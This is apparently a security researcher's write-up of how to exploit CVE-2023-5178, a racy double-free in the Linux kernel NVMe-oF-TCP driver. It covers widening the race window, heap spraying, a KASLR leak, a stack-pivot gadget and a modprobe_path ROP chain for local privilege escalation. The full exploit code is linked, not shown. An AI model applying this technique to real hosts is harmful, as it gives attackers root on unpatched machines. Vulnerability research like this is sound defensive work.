7 February 2024

CVE-2023-5178: exploiting Linux kernel NVMe-oF-TCP driver on Ubuntu 23.10

by rockrid3r

The NVMe-oF-TCP driver had a vulnerability found by Alon Zahavi. It leads to the racy double-free in kmalloc-96, which can be exploited to gain LPE. The bug is a logic error during the handle of corrupted Initialize Connection Request. Let’s exploit it.

The bug

Communication in NVMe-oF-TCP happens with PDUs(Partial Data Unit). Every request to server is a PDU and every response from server is a PDU. See PDU structure at page 15 in the overview presentation.

The bug was in the function nvmet_tcp_handle_icreq which handles the Initialize Connection Request.

If you provide the icreq(Initialize Connection Request) with incorrect payload len (by specification the length for every icreq is fixed and is the same), then you made a “fatal error” and you connection is gotta be closed and if you used the pdu-header/data hashing (to make sure of your pdu/data integrity), the corresponding hashing objects will be feed… 2 times:

static int nvmet_tcp_handle_icreq(struct nvmet_tcp_queue *queue)
{
	struct nvme_tcp_icreq_pdu *icreq = &queue->pdu.icreq;
	struct nvme_tcp_icresp_pdu *icresp = &queue->pdu.icresp;
	struct msghdr msg = {};
	struct kvec iov;
	int ret;

	if (le32_to_cpu(icreq->hdr.plen) != sizeof(struct nvme_tcp_icreq_pdu)) {
		pr_err("bad nvme-tcp pdu length (%d)\n",
			le32_to_cpu(icreq->hdr.plen));
		nvmet_tcp_fatal_error(queue); // **schedules** a 2nd free
        // does not return here
	}
    // ...

	ret = kernel_sendmsg(queue->sock, &msg, &iov, 1, iov.iov_len); // err since socket is killed
	if (ret < 0)
		goto free_crypto;

	// ...
free_crypto:
	if (queue->hdr_digest || queue->data_digest)
		nvmet_tcp_free_crypto(queue); // 1st free
}

The nvmet_tcp_fatal_error kills a socket and schedules a queue release:

static void nvmet_tcp_fatal_error(struct nvmet_tcp_queue *queue)
{
	queue->rcv_state = NVMET_TCP_RECV_ERR;
	if (queue->nvme_sq.ctrl)
		nvmet_ctrl_fatal_error(queue->nvme_sq.ctrl);
	else // we go here
		kernel_sock_shutdown(queue->sock, SHUT_RDWR); // triggers sk_state_change (see how below)
}

static void nvmet_tcp_state_change(struct sock *sk)
{
// ...
	switch (sk->sk_state) {
// ...
	case TCP_FIN_WAIT1: // we go here since the server closed connection
	case TCP_CLOSE_WAIT:
	case TCP_CLOSE:
		/* FALLTHRU */
		nvmet_tcp_schedule_release_queue(queue); // schedules the free on workqueue 
		break;
	}
// ...
}

static void nvmet_tcp_schedule_release_queue(struct nvmet_tcp_queue *queue)
{
	spin_lock(&queue->state_lock);
	if (queue->state != NVMET_TCP_Q_DISCONNECTING) {
		queue->state = NVMET_TCP_Q_DISCONNECTING;
		queue_work(nvmet_wq, &queue->release_work);
	}
	spin_unlock(&queue->state_lock);
}

static void nvmet_tcp_release_queue_work(struct work_struct *w)
{
//...
	if (queue->hdr_digest || queue->data_digest)
		nvmet_tcp_free_crypto(queue);
//...
}

static void nvmet_tcp_free_crypto(struct nvmet_tcp_queue *queue)
{
	struct crypto_ahash *tfm = crypto_ahash_reqtfm(queue->rcv_hash);

	ahash_request_free(queue->rcv_hash);
	ahash_request_free(queue->snd_hash);
	crypto_free_ahash(tfm);
}

So the function nvmet_tcp_free_crypto is called from both

the “main thread” in nvmet_tcp_handle_icreq after failed kernel_sendmsg()
the nvmet_wq worker which was triggered in nvmet_tcp_schedule_release_queue

funny-2-free-image

So the double-free here. Both the snd_hash, rcv_hash come from kmalloc-96 cache. The double free is raced since we do not know what time it will take before nvmet_wq worker will start doing his queue-release job.

Exploitation

Trouble of dealing with double-free

On systems with CONFIG_SLAB_FREELIST_HARDENED you may consider yourself done as soon as consecutive double free happened (without reallocation between calls):

+-----------------------+       +---------------------+       +--------------------+       +--------------------+
|                       |       |                     |       |                    |       |                    |
|     Object A          |       |       Object B      |       |      Object A      |       |       Object C     |
|                       |       |                     |       |                    |       |                    |
|                       |       |                     |       |                    |       |                    |
|   freelist ^ random   +------->   freelist ^ random +------>+  freelist ^ random +------>+  freelist ^ random +-----> ...
|                       |       |                     |       |                    |       |                    |
|                       |       |                     |       |                    |       |                    |
|                       |       |                     |       |                    |       |                    |
|                       |       |                     |       |                    |       |                    |
|                       |       |                     |       |                    |       |                    |
+-----------------------+       +---------------------+       +------------^-------+       +--------------------+
            ^                                                              |
            |                                                              |
            |                                                              |
            +------------------------+the same object (double-free)+-------+

When CONFIG_SLAB_FREELIST_HARDENED is enabled, the freelist pointer is not stored in plaintext. It is xor’ed with some random secret from the corresponding kmem_cache and with something else (does not matter here). As soon as you allocate the object A and overwrite it’s contents (and especially you overwrite the freelist), the freelist becomes corrupted and you can’t do much about it since you don’t know the random secret from kmem_cache:

                               +---------------------+       +--------------------+        +------------------+
                               |                     |       |                    |        |                  |
                               |     Object B        |       |     Object A       |        |                  |
                               |                     |       |                    |        |                  |
                               |                     |       |                    |        |  Unmapped region |
                               | freelist ^ random   +------>+  written_data      +------->+                  |
                               |                     |       |                    |        |                  |
                               |                     |       |  !!!!!!!!!!!!!!!!  |        |                  |
                               |                     |       |                    |        |                  |
                               |                     |       |                    |        |                  |
                               +---------------------+       +--------------------+        +------------------+

If you allocate 2 more objects, the kernel will crash.

So we need to realloc freed chunks before they are freed once more.

Enlarging race window

As we understand, the double-free is racy and the window between 2 free calls is very tight. Remainder:

1st free happens in “main thread”
2nd free is performed by nvmet_wq worker as soon as it feels to do it.

As we discussed above, we can’t let double-free happen without reallocation in between: system will crash.

The solution is simple: we need to make nvmet_wq worker busy. Then we will have some time to reallocate the freed chunks before they will be freed again.

Let’s look at how the queue is created. There is a loop called nvmet_tcp_accept_work, which accepts connection and creates a corresponding queue. The problem is that it creates a new queue for every TCP connection:

static void nvmet_tcp_accept_work(struct work_struct *w)
{
	struct nvmet_tcp_port *port =
		container_of(w, struct nvmet_tcp_port, accept_work);
	struct socket *newsock;
	int ret;

	while (true) {
		ret = kernel_accept(port->sock, &newsock, O_NONBLOCK); // here is accept()
		if (ret < 0) {
			if (ret != -EAGAIN)
				pr_warn("failed to accept err=%d\n", ret);
			return;
		}
		ret = nvmet_tcp_alloc_queue(port, newsock); // allocates queue!
		if (ret) {
			pr_err("failed to allocate queue\n");
			sock_release(newsock);
		}
	}
}

static int nvmet_tcp_alloc_queue(struct nvmet_tcp_port *port,
		struct socket *newsock)
{
	struct nvmet_tcp_queue *queue;
	int ret;

	queue = kzalloc(sizeof(*queue), GFP_KERNEL);
	if (!queue)
		return -ENOMEM;

	INIT_WORK(&queue->release_work, nvmet_tcp_release_queue_work); // exactly what is needed
	// ...
    ret = nvmet_tcp_set_queue_sock(queue); // sets up sk_state_change for socket.
    // ...
}

static int nvmet_tcp_set_queue_sock(struct nvmet_tcp_queue *queue)
{
	struct socket *sock = queue->sock;
    // ... 
	if (sock->sk->sk_state != TCP_ESTABLISHED) {
		/*
		 * If the socket is already closing, don't even start
		 * consuming it
		 */
		ret = -ENOTCONN;
	} else {
		// ...
		queue->state_change = sock->sk->sk_state_change;
		sock->sk->sk_state_change = nvmet_tcp_state_change;
		// ...
	}
	write_unlock_bh(&sock->sk->sk_callback_lock);

	return ret;
}

static void nvmet_tcp_state_change(struct sock *sk)
{
//...
	switch (sk->sk_state) {
//...
	case TCP_CLOSE_WAIT: // client closed connection
	case TCP_CLOSE:
		/* FALLTHRU */
		nvmet_tcp_schedule_release_queue(queue); // schedules a worker job
		break;
//...
	}
//...
}

It means that if we create a TCP connection and then close it, the kernel will schedule a worker job responsible for cleaning up the allocated queue.

Let’s create a lot of such “dummy” connections, and then close all of them. It will populate our nvmet_wq workqueue with dummy jobs. And if we trigger double-free now (by sending a wrong icreq), the kernel will not cause corrupted freelist rightaway: the nvmet_wq worker has a lot of jobs to do before the 2nd free. So we have some time to realloc the freed chunks after the 1st free. The same object will not get twice inside the same freelist.

Reallocation strategy

Our target objects are in kmalloc-96 cache, so I’ve chosen the setxattr + fuse spray. The idea is to realloc the freed objects after the 1st free and then realloc them again after the 2nd. After this we will have a controllable use-after-free in kmalloc-96.

nvmet_tcp_alloc_crypto allocates snd_hash, rcv_hash
1st free of both snd_hash, rcv_hash
reallocate objects.
2nd free of both snd_hash, rcv_hash
reallocate objects.

We will mark every xattr with it’s index in spray, like this:

*(uint64_t*)&xattr_i[0] = i

So all but 2 xattrs will have *(uint64_t*)&xattr_i[0] == i. Those 2 xattrs (which reallocated snd_hash, rcv_hash after the 1st free) will have the *(uint64_t*)&xattr_i[0] != i. Moreover, values written in them will correspond to xattrs which reallocated the snd_hash, rcv_hash after the 2nd free. In exploit, I call those values tag[0], tag[1].

In order to check the value of xattr_i we need to release it. It will trigger the free on the object. If the value written in xattr_i does not equal to i, it means we found the corrupted object and we need to realloc it ASAP so that somebody else doesn’t take our object.

Freeing a tag[0] or tag[1] will trigger the UAF(and content leak, see below) on whatever kmalloc-96 object they were overlapped with.

Hijacking control flow

We are going to hijack control flow with crypto_tfm object. Consider the struct ahash_request:

struct ahash_request {
	struct crypto_async_request base;                

	unsigned int               nbytes;               

	struct scatterlist *       src;                  
	u8 *                       result;               
	void *                     priv;                 
	void *                     __ctx[];
};

(dumped with pahole)

struct crypto_async_request {
	struct list_head           list;      
	crypto_completion_t        complete;  
	void *                     data;      
	struct crypto_tfm *        tfm;       // target pointer
	u32                        flags;     
};

In function nvmet_tcp_free_crypto this rcv_hash.base.tfm pointer is converted into the crypto_ahash (with container_of macro) object from kmalloc-128:

struct crypto_tfm {
	refcount_t refcnt;
	u32 crt_flags;
	int node;
	void (*exit)(struct crypto_tfm *tfm);
	struct crypto_alg *__crt_alg;
	void *__crt_ctx[] CRYPTO_MINALIGN_ATTR;
    // size: 32
};

struct crypto_ahash {
	int                        (*init)(struct ahash_request *);
	int                        (*update)(struct ahash_request *);
	int                        (*final)(struct ahash_request *);
	int                        (*finup)(struct ahash_request *);
	int                        (*digest)(struct ahash_request *);
	int                        (*export)(struct ahash_request *, void *);
	int                        (*import)(struct ahash_request *, const void  *);
	int                        (*setkey)(struct crypto_ahash *, const u8  *, unsigned int);
	unsigned int               reqsize;
	struct crypto_tfm          base;
};

                                      +--------------------+
                                      |     struct         |
                                      |  crypto_ahash      |
                                      |                    |
                                      |                    |
    +-------------------------+       |                    |
    |    struct ahash_request |       |                    |
    |     (rcv_hash)          |       |                    |
    |                         |       |                    |
    |                         |       |                    |
    +-------------------------+       |                    |
    |         tfm             +------>+--------------------+
    +-------------------------+       |                    |
    |                         |       |                    |
    |                         |       |                    |
    |                         |       |                    |
    |                         |       |   embedded         |
    |                         |       | struct crypto_tfm  |
    +-------------------------+       |                    |
                                      |                    |
                                      |                    |
                                      |                    |
                                      |                    |
                                      +--------------------+

Let’s see how free proceeds:

static void nvmet_tcp_free_crypto(struct nvmet_tcp_queue *queue)
{
	struct crypto_ahash *tfm = crypto_ahash_reqtfm(queue->rcv_hash);

	ahash_request_free(queue->rcv_hash);
	ahash_request_free(queue->snd_hash);
	crypto_free_ahash(tfm); // convertation is here
}

After convertation the function crypto_destroy_tfm is called with args mem=crypto_ahash, tfm=crypto_ahash.base:

void crypto_destroy_tfm(void *mem, struct crypto_tfm *tfm)
{
	struct crypto_alg *alg;

	if (IS_ERR_OR_NULL(mem))
		return;

	if (!refcount_dec_and_test(&tfm->refcnt))
		return;
	alg = tfm->__crt_alg;

	if (!tfm->exit && alg->cra_exit)
		alg->cra_exit(tfm);
	crypto_exit_ops(tfm); // goes here
	crypto_mod_put(alg);
	kfree_sensitive(mem);
}

static void crypto_exit_ops(struct crypto_tfm *tfm)
{
	const struct crypto_type *type = tfm->__crt_alg->cra_type;

	if (type && tfm->exit)
		tfm->exit(tfm); // here we go
}

Corrupting the tfm.exit will lead to hijacking control flow. We don’t have a direct access to tfm object, but we can overwrite the rcv_hash (struct ahash_request).

We will overwrite the rcv_hash.tfm to the address that we do control and then perform ROP.

Leaks

So we basically want 2 things:

kmalloc-128+ pointer to store both our rop and crypto_tfm object.
kernel text pointer to bypass KASLR

Bypassing KASLR

Bypassing KASLR object was pretty straightforward. I’ve chosen the struct squashfs_page_actor for pointer leak:

struct squashfs_page_actor {
	union {
		void		**buffer;
		struct page	**page;
	};
	void	*pageaddr;
	void	*tmp_buffer;
	void    *(*squashfs_first_page)(struct squashfs_page_actor *);
	void    *(*squashfs_next_page)(struct squashfs_page_actor *);
	void    (*squashfs_finish_page)(struct squashfs_page_actor *);
	struct page *last_page;
	int	pages;
	int	length;
	int	next_page;
	int	alloc_buffer;
	int	returned_pages;
	pgoff_t	next_index;
};

It resides in kmalloc-96, has kernel pointers at .squashfs_*_page member, and we probably can even corrupt it to hijack control flow, but I decided to not go there, only leak kernel pointers and stay with NVMe primitives instead.

Leaking kmalloc-128

As we recall the rcv_hash.tfm contains the pointer inside the kmalloc-128 object(at offset 72). Leaking it will give us the needed heap leak.

Arbitrary free

The key here is again the .tfm member of rcv_hash(snd_hash won’t work).

The .tfm is extracted from rcv_hash, then the pointer is converted to the base object holding it, the struct crypto_ahash(kmalloc-128), and then this struct crypto_ahash is freed.

So corrupting the .tfm of rcv_hash will result in arbitrary free.

Reusing tfm to store ROP reliably

Imagine we have 2 rcv_hash objects: rcv_hash1, rcv_hash2. We learned that we can leak a rcv_hash1.base.tfm pointer (kmalloc-128). Let’s use our leaked .tfm(call it leaked_tfm) pointer fromrcv_hash1 and set the rcv_hash2.base.tfm=leaked_tfm. So closing the 1st connection frees the leaked_tfm pointer and causes the rcv_hash2.base.tfm to be a dangling pointer.

Reallocating leaked_tfm with both ROP-chain and corrupted crypto_tfm provides a comfortable stack pivoting (see below).

                                        +------------+
                                        |            |<------+
                                        |    ROP     |       |
                                        |            |       | stack pivot
                                        +------------+       |
                                        | crypto_tfm |-------+
                                        +------------+

ROP

The r12 register contains the pointer to the top of crypto_ahash (which we will control). Other register did not contain anything useful.

Stack pivot

So the r12 pointer contains the top address of crypto_ahash object which holds the crypto_tfm at +72 offset.

Placing ropchain at the top of crypto_ahash makes the pivoting straightforward with this gadget:

0xffffffff81c15e22 : push r12 ; add byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; xor edx, edx ; xor esi, esi ; xor edi, edi ; jmp 0xffffffff8215ad10

It basically made my day. After executing it, the rsp points to the top of crypto_ahash and we have 72/8=9 qwords to perform rop.

ROP-chain

I’ve chosen to overwrite of modprobe_path and then msleep(-1).

See full exploit code here.

Backporting to Linux Kernel v5.

Let’s discuss exploitation of the bug in Linux Kernel v5. As we can see, the struct crypto_tfm now does not have the refcnt member:

struct crypto_tfm {

	u32 crt_flags;

	int node;

	void (*exit)(struct crypto_tfm *tfm);

	struct crypto_alg *__crt_alg;

	void *__crt_ctx[] CRYPTO_MINALIGN_ATTR;
};

The crypto_tfm is part of crypto_ahash object, located at it’s footer. In kernel v6 the total size of crypto_ahash was 104 (because of refcnt member of crypto_tfm structure), so the object is moved into kmalloc-128. (Simple exercise for reader to check it out). But in v5, the crypto_tfm does not have the refcnt member, so the crypto_ahash object is stored into kmalloc-96.

It means that the .tfm pointer in rcv_hash now points into the kmalloc-96 object. Moreover, it is allocated every time the rcv_hash is allocated (in ) and freed every time `rcv_hash` is freed (in). So now we have double-free on triplet of objects: snd_hash, rcv_hash, and rcv_hash.tfm!

It means that by using the same fuse+setxattr spray we now own the contents of rcv_hash.tfm, which is a huge advantage for exploitation. In v6 in order to hijack control flow we had to corrupt the .tfm pointer in rcv_hash to the known location because we was not in control of it’s content; now we don’t have to AND we have a control of it’s content. Happy pwning!

tags: